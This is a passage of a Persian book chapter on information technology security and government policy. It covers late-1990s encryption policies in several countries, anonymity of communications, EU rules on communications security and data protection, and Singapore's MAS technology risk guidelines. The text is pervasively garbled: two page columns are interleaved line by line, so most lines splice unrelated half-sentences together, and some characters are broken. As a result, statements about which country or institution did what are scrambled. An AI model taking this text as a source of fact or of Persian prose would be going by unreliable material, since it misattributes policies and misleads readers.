ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ۱۹۹۰ﻛﺸﻮﺭﻫﺎﻱ ﻛﺎﻧﺎﺩﺍ ،ﺁﻟﻤﺎﻥ ،ﺍﻳﺮﻟﻨـﺪ ﻭ ﻓﻨﻼﻧـﺪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺼﻮﺭﺕ ﮔﻤﻨـﺎﻡ .٨٩ﮔـﺰﺍﺭﺵ ﺗﻔـﺴﻴﺮﻱ ﺍﻳـﻦ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻠﻲ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ OECD ﻣﻌﺎﻫﺪﻩ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺍﺯ ﺍﺭﺍﺋﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﺗﻮﻗـﻊ
ﺗﻬﻴﻪ ﻛﺮﺩﻧﺪ ،ﺗﺎ ﺑﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺭﺍﻳﮕﺎﻥ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻛﻤـﻚ ﻛـﺮﺩﻩ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﺛﺒﺖ ﻧـﺎﻡ ﻣـﺸﺘﺮﻛﻴﻦ ﺧـﻮﺩ ﺭﺍ ﻧـﺪﺍﺭﺩ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺑـﻪ
ﺑﺎﺷــﻨﺪ .ﻓﺮﺍﻧــﺴﻪ ﻛــﻪ ﺳــﺎﺑﻘﻪﺍﻱ ﻃــﻮﻻﻧﻲ ﺩﺭ ﻣﺤــﺪﻭﺩﻛﺮﺩﻥ ﻣﻮﺟﺐ ﺍﻳﻦ ﻣﻌﺎﻫـﺪﻩ ،ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣﻠـﺰﻡ ﺑـﻪ ﺛﺒـﺖ
ﻼ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺷﺖ ﺩﺭ ﮊﺍﻧﻮﻳﻪ ﺳﺎﻝ ۱۹۹۹ﺍﻳﻦ ﺳﻴﺎﺳﺖ ﺭﺍ ﻛـﺎﻣ ﹰ ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺘﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺸﺘﺮﻛﻴﻦ ﻭ ﻳﺎ ﻣﻘﺎﻭﻣـﺖ ﺩﺭ
ﺗﻐﻴﻴﺮ ﺩﺍﺩ ﻭ ﺍﻋﻼﻡ ﻛﺮﺩ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﻣﺤـﺪﻭﻳﺖ ﺑﺮﺍﺑﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻣﺴﺘﻌﺎﺭ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲ ﺑﺎﺷﻨﺪ .ﺷـﻮﺭﺍﻱ
ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﺩﺭ ﺩﺳﺎﻣﺒﺮ ،۱۹۹۷ﺑﻠﮋﻳﻚ ﻗﺎﻧﻮﻥ ﺳﺎﻝ ۱۹۹۴ﺧـﻮﺩ ﺍﺭﻭﭘــﺎ ﺩﺭ ﺳــﺎﻝ ۲۰۰۳ﺑﻴﺎﻧﻴــﻪﺍﻱ ﺭﺍ ﺩﺭ ﻣــﻮﺭﺩ ﺁﺯﺍﺩﻱ ﺍﺭﺗﺒﺎﻃــﺎﺕ
ﺩﺭ ﺧﺼﻮﺹ ﻣﺤﺪﻭﺩﻳﺖ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍ ﺍﺻـﻼﺡ ﻧﻤـﻮﺩ .ﺍﻳـﺎﻻﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎ ﺍﻳﻦ ﻣﻀﻤﻮﻥ ﺑـﻪ ﭼـﺎﭖ ﺭﺳـﺎﻧﺪ" :ﺑﻤﻨﻈـﻮﺭ ﺍﻓـﺰﺍﻳﺶ
ﻣﺘﺤﺪﻩ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﺑﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺗﺠﺎﺭﺕ ﻣﺤﺼﻮﻻﺕ ﻭ ﺍﻧﺘﺸﺎﺭ ﺁﺯﺍﺩ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﻳﺪﻩﻫﺎ ،ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﺑﺎﻳـﺪ ﺑـﻪ ﺍﻳـﺪﺓ
ﺧﺪﻣﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩ ﺑﻮﺩ ،ﺗﻤﺎﻣﻲ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺣﺘﺮﺍﻡ ﺑﮕﺬﺍﺭﻧﺪ ﻭ ﻧـﻪ ﻫﻮﻳـﺖ ﺁﻧـﺎﻥ" .ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ،
ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺩﺭ ﺳﺎﻝ ۲۰۰۰ﺭﻓﻊ ﻛﺮﺩ. ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﺑﺼﻮﺭﺕ ﮔﻤﻨﺎﻡ ﺭﺍ
ﺑﻪ ﺭﺳﻤﻴﺖ ﺷﻨﺎﺧﺖ ﻭ ﺑﺎ ﺍﻧﺘﺸﺎﺭ ﺑﻴﺎﻧﻪﺍﻱ ﺩﺭ ﻣـﻮﺭﺩ ﻧﺤـﻮﺓ ﺍﻳﺠـﺎﺩ
ﻗﺎﻧﻮﻥ ﻭ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ ﺍﻣﻦﺗﺮ ﺍﻇﻬﺎﺭ ﺩﺍﺷﺖ" :ﮔﻮﻧـﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻩﺍﻧـﺪ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺄﻳﻴﺪ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻣﺎ ﺩﺭ ﻣﺤﻴﻄﻲ ﻛﻪ ﺑـﺎ
ﻛﻪ ﻓﺸﺎﺭ ﺑﺎﺯﺍﺭ ﻣﺼﺮﻑ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣـﺆﺛﺮ ﺗﻬﺪﻳـﺪﺍﺕ ﺁﻥ ﺗﻌﺎﻣﻞ ﺩﺍﺭﻳﻢ ﻻﺯﻡ ﺍﺳﺖ .ﺩﺭ ﺑﻌﻀﻲ ﻣﺤﻴﻄﻬـﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ ﻭ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﻻﺯﻡ ﺑﺎﺷــﺪ ﻳــﺎ ﺗــﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷــﻮﺩ ﻛــﻪ ﮔﻤﻨــﺎﻡ ﺑــﺎﻗﻲ ﺑﻤــﺎﻧﻴﻢ".
ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻄﺎﻟﻌـﺎﺕ ﺷـﺒﻜﻪ ﻭ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺳـﺎﻝ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﺩﺍﺩﻩﻫﺎ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ" .ﻛﺎﻧﺎﺩﺍ ﺭﻭﻳﻜﺮﺩ ﻣـﺸﺎﺑﻬﻲ ﺭﺍ ﺩﺭﭘـﻴﺶ ﮔﺮﻓﺘـﻪ ﺣﺎﻣﻲ ﺗﻮﺳﻌﺔ ﺧﺪﻣﺎﺕ ﻭ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻫـﺴﺘﻨﺪ ،ﻭ ﻣﻨـﺎﺑﻊ ﺭﺍ
ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ،ﺑﺮ ﺍﺳﺎﺱ ﻣـﺼﻮﺑﺔ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﻛﺎﻫﺶ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺭﺍ ﺍﻓـﺰﺍﻳﺶ ﻣـﻲﺩﻫﻨـﺪ.
ﺷﺨﺼﻲ ﻭ ﻣﺪﺍﺭﻙ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ٩٢ﺷﺮﻛﺘﻬﺎﻱ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺯﻣﺎﻧﻴﻜﻪ ﻓﻨﺎﻭﺭﻱ ﺑﻪ ﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ ،ﻗـﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ
ﻣﻮﻇﻔﻨﺪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺗـﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘـﻲ ﺳﺪ ﺭﺍﻩ ﺍﺟﺮﺍﻱ ﺭﺍﻩﺣﻠﻬﺎﻱ ﺍﺑﺘﻜﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺷﻮﻧﺪ.
ﺧﺎﺻﻲ ﺑﻴﺎﻧﺪﻳﺸﻨﺪ. ﺩﺭﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺳﺆﺍﻝ ﺍﺳﺎﺳﻲ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑﻬﺘـﺮﻳﻦ ﺭﻭﺵ
ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻣﻔﺼﻞﺗﺮﻱ ﺭﺍ ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪﻩ ﺍﺳـﺖ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﭼﻴﺴﺖ؟ ﺑﻄـﻮﺭ ﻛﻠـﻲ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ
ﻛــﻪ ﺑــﻪ ﻗــﻮﺍﻧﻴﻦ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺩﺭ ﺻــﻨﻌﺖ ﺍﺭﺗﺒﺎﻃــﺎﺕ ﺍﺻﻞ ﺍﺳﺎﺳﻲ ،ﺩﻭﻟﺖ ﻧﺒﺎﻳﺪ ﺿﻮﺍﺑﻂ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑـﻪ ﮔﺮﺩﺍﻧﻨـﺪﮔﺎﻥ ﻭ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲ ﭘـﺮﺩﺍﺯﺩ .ﻣـﺎﺩﺓ ۴ﺍﻳـﻦ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻞ ﻣـﺸﺨﺺ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﺤﻤﻴﻞ ﻛﻨﺪ .ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ
ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﻳﻚ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﻩ ﺧﺪﻣﺎﺕ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ "ﺑﺎﻳﺪ ﺑﺎﻭﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﻭ ﺿﻮﺍﺑﻂ ﻣﺮﺗﺒﻂ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺗﺄﺛﻴﺮ
ﺍﻗﺪﺍﻣﺎﺗﻲ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺧـﻮﺩ ﻭ ﺩﺭﺻـﻮﺭﺕ ﻭ ﺣﺘﻲ ﮔﺎﻫﻲ ﺯﻳﺎﻥﺁﻭﺭ ﻫﺴﺘﻨﺪ.
ﻟﺰﻭﻡ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪﮔﺎﻥ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻋﻤﻮﻣﻲ ﺷﺒﻜﻪ )ﺑﺎ ﺗﻮﺟﻪ ﺑـﻪ
ﺩﺭ ﻋﻮﺽ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﺤﻤﻴﻞ ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﺣﻔـﻆ
ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ( ﺍﻧﺠﺎﻡ ﺩﻫﺪ ".ﺩﻭﻡ ﺍﻳﻨﻜـﻪ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺍﻣﻨﻴﺖ ﺍﺳﺖ .ﺍﻳـﻦ ﺭﻭﻳﻜـﺮﺩ ﻛـﻪ ﺍﺯ ﻣﻔﻬـﻮﻡ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺣـﺮﻳﻢ
ﻋﻤﻮﻣﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺑﺎﻳﺪ ﺑﻪ ﻣﺸﺘﺮﻛﻴﻦ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﻧﻮﻉ ﺗﻬﺪﻳـﺪ
ﺧﺼﻮﺻﻲ ﺑﺮﺧﺎﺳﺘﻪ ﺑﻮﺩ ،ﺩﺭ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎﻳﻲ ﻛـﻪ ﺩﺍﺩﻩ ﻫـﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﻫﺸﺪﺍﺭ ﺩﻫﻨﺪ ﻭ "ﺯﻣـﺎﻧﻲ ﻛـﻪ ﺧﻄـﺮ ﺩﺭ ﺧـﺎﺭﺝ ﺍﺯ ﺣﻴﻄـﻪ
ﺷﺨﺼﻲ ﺭﺍ ﺟﻤـﻊﺁﻭﺭﻱ ﻭ ﭘـﺮﺩﺍﺯﺵ ﻣـﻲﻛﺮﺩﻧـﺪ ﺍﺟﺒـﺎﺭﻱ ﺷـﺪ.
ﻗﺪﺭﺕ ﻭ ﺍﺧﺘﻴﺎﺭ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﺳـﺖ ﻫـﺮ ﻧـﻮﻉ ﺗﻐﻴﻴـﺮ ﺍﺯ ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﺗﻤﺮﻛـﺰ ﺑـﺮ ﺑﺨـﺸﻬﺎﻱ ﺧـﺎﺹ ﺍﻗﺘـﺼﺎﺩﻱ ﺍﺳـﺖ.
ﺟﻤﻠﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻧﺪ".
ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺩﺭ ﺿـﻮﺍﺑﻄﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺣـﺮﻳﻢ
ﭼﮕﻮﻧﻪ ﺍﻳﻦ ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﻋﻤﻠﻲ ﻣـﻲﺷـﻮﻧﺪ؟ ﺳـﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺍﻳـﻦ ﺧﺼﻮﺻﻲ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺧﺪﻣﺎﺕ ﺑﻬﺪﺍﺷﺘﻲ ﻭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻭﺿﻊ
٩٣
ﻣﻮﺭﺩ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺧﺎﺹ ﺩﺍﺭﺩ .ﻣﻘﺎﻣﺎﺕ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ )(MAS ﻛﺮﺩﻩ ،ﺍﻟﺰﺍﻣﺎﺗﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫـﺎﻱ ﺷﺨـﺼﻲ
ﻳﻜﺴﺮﻱ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺟﺎﻣﻊ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺩﺭ ﺭﻫﻨﻤﻮﻧﻬﺎﻱ ﮔﻨﺠﺎﻧﺪﻩ ﺍﺳﺖ .ﺳﻨﮕﺎﭘﻮﺭ ﻫﻢ ﺭﻭﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺗﻤﺮﻛـﺰ ﻛـﺮﺩﻩ؛
ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ٩٤ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﺍﻋﻼﻡ ﻛﺮﺩﻧﺪ. ﺍﻣﺎ ﻧﻪ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ -ﺧﻂﻣـﺸﻲﻫـﺎﻱ
ﺍﻳﻦ ﺭﻫﻨﻤﻮﻧﻬﺎ ﺑﺪﻧﺒﺎﻝ ﺍﺭﺗﻘـﺎ ﻭ ﺑﻬﺒـﻮﺩ ﻓﺮﺁﻳﻨـﺪﻫـﺎﻱ ﺻـﺤﻴﺢ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳـﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺧـﺼﻮﺹ ﺍﺩﺍﺭﻩﻫـﺎﻱ ﺧـﺪﻣﺎﺕ
ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﻭ ﻛﺎﺭﺑﺮﺩ ﺭﻭﻳﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺩ ﺍﻣـﺎ ﻣﺎﻟﻲ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﭘﺮﺩﺍﺧﺘﻪﺍﻧﺪ ﻭ ﻧﻪ ﺗﻬﺪﻳـﺪﺍﺕ
ﺭﻋﺎﻳﺖ ﺁﻥ ﺑﺮﺍﻱ ﻛﺴﻲ ﺍﺟﺒﺎﺭﻱ ﻧﺪﺍﺷﺖ .ﺩﺭﻋﻮﺽ ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ .ﻫﻤﭽﻨـﻴﻦ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺑـﺮﺍﻱ ﺗﺒـﺪﻳﻞ
ﺩﺭ ﺧﻂﻣﺸﻲﻫﺎ ﺫﻛﺮ ﺷﺪﻩ" :ﻣﻘﺎﻣﺎﺕ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻨﺎ ﺩﺍﺭﻧﺪ ﺍﻳـﻦ ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﺮﺍﺣﻞ ﺍﻣﻨﻴﺘﻲ ﮔﺎﻡ ﺑﻪ ﮔـﺎﻡ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
ﺭﻭﻳﻜﺮﺩﻫــﺎ ﺭﺍ ﺩﺭ ﻧﻈــﺎﺭﺕ ﺑــﺮ ﺍﺭﺯﻳــﺎﺑﻲ ﺗﻬﺪﻳــﺪﺍﺕ ﻓﻨــﺎﻭﺭﻱ ﻭ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺑﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﻭﻟﺖ ،ﺗﺄﻛﻴـﺪ ﺑـﺮ
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﻭﺍﺭﺩ ﻛﻨﻨـﺪ .ﻫـﺮ ﻣﺆﺳـﺴﻪ ﻓﺮﺁﻳﻨﺪﻫﺎ ﺑﻪ ﺟـﺎﻱ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻣـﻲ ﺑﺎﺷـﺪ .ﺭﻭﻳﻜـﺮﺩ ﺩﻳﮕـﺮ ﺗﻬﻴـﺔ
ﺩﺭﺻﻮﺭﺕ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﺧﻂﻣـﺸﻲﻫـﺎ ﺍﺯ ﻃـﺮﻑ MASﺻـﺎﺣﺐ ﺧﻂﻣﺸﻲﻫﺎ ﺍﺳﺖ .ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻫﺎ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﻣﻜﻤـﻞ ﻳﻜـﺪﻳﮕﺮ
ﻣﻨﺎﻓﻊ ﻭﻳﮋﻩﺍﻱ ﺧﻮﺍﻫﺪ ﺷﺪ ،ﻭ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﻣﺆﺳﺴﺎﺕ ﻣـﺎﻟﻲ ﺑـﻪ ﺑﺎﺷﻨﺪ.
ﺗﻼﺵ ﺑﺮﺍﻱ ﻫﻤﺎﻫﻨﮕﻲ ﺑﺎ ﺧﻂﻣﺸﻲﻫﺎ ﺗـﺸﻮﻳﻖ ﺷـﺪﻩﺍﻧـﺪ ".ﺍﻳـﻦ ﺍﺭﻭﭘﺎ ﺍﻋﻤﺎﻝ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎﻳﻲ ﻛـﻪ
ﺧﻂﻣﺸﻲﻫﺎ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﺑﻪ ﺣـﺴﺎﺏ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﭘﺮﺩﺍﺯﺵ ﻣﻲﻛﻨﻨﺪ ﺁﻏﺎﺯ ﻛـﺮﺩﻩ
ﺑﻴﺎﻳﻨﺪ .ﻓﻬﺮﺳﺖ ﺫﻳﻞ ﺩﺭ ﻣﻮﺭﺩ ﺷﻴﻮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﺍﺳﺖ .ﻣﺎﺩﺓ ۱۷ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫـﺎﻱ ﺍﺗﺤﺎﺩﻳـﺔ ﺍﺭﻭﭘـﺎ
"ﺑﺎﻳﺪ"ﻫﺎﻳﻲ ﺭﺍ ﺑﺮ ﻣﻲﺷﻤﺎﺭﺩ: ﺩﺍﺭﻧﺪﮔﺎﻥ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﺮﻡ ﺍﻓـﺰﺍﺭﻱ ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ ﺑﺎﻳـﺪ ﺑـﻪ • ﺍﺯ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺗﺨﺮﻳﺐ ،ﺗﻐﻴﻴﺮ ،ﺍﻓـﺸﺎﺳﺎﺯﻱ ﻳـﺎ ﺩﺳﺘﺮﺳـﻲ
ﺑﺎﻻﺗﺮﻳﻦ ﺩﺭﺟﺔ ﺍﻣﻨﻴﺖ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻣﺠﻬﺰ ﺷﻮﻧﺪ ،ﻭ ﺩﺭ ﺟﻬﺖ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ )ﺑﻮﻳﮋﻩ ﺯﻣﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺷـﺎﻣﻞ ﺍﻧﺘﻘـﺎﻝ ﺩﺍﺩﻩﻫـﺎ ﻣﻴـﺎﻥ
ﺷﺒﻜﻪﻫﺎ ﺑﺎﺷﺪ( ﺍﻗﺪﺍﻣﺎﺕ ﺳﺎﺯﻣﺎﻧﻲ ﻭ ﻓﻨﻮﻥ ﻣﻨﺎﺳﺐ ﺭﺍ ﺑﻜـﺎﺭ ﮔﻴﺮﻧـﺪ.
92 Personal Information Protection And ﺍﻳﻦ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻫﻤﭽﻨﻴﻦ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ "ﭼﻨﻴﻦ ﺍﻗﺪﺍﻣﺎﺗﻲ ﺑﺎﻳـﺪ
Electronic Documents Act
93 Monetary Authority of Singapore ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣﺨﺎﻃﺮﺍﺕ ﻃﺒﻴﻌﻲ ﭘـﺮﺩﺍﺯﺵ
94 Technology Risk Management Guideline
٢٥٣ ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﻛﻔﺎﻳــﺖ ﺳﻴﺎﺳــﺘﻬﺎ ،ﻓﺮﺁﻳﻨــﺪﻫﺎ ،ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋــﺎﺕ • ﺗﻘﻮﻳﺖ ،ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻭ ﺍﻗﺪﺍﻣﺎﺕ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺩﻳﮕﺮ ﺍﺯ ﻃﺮﻑ
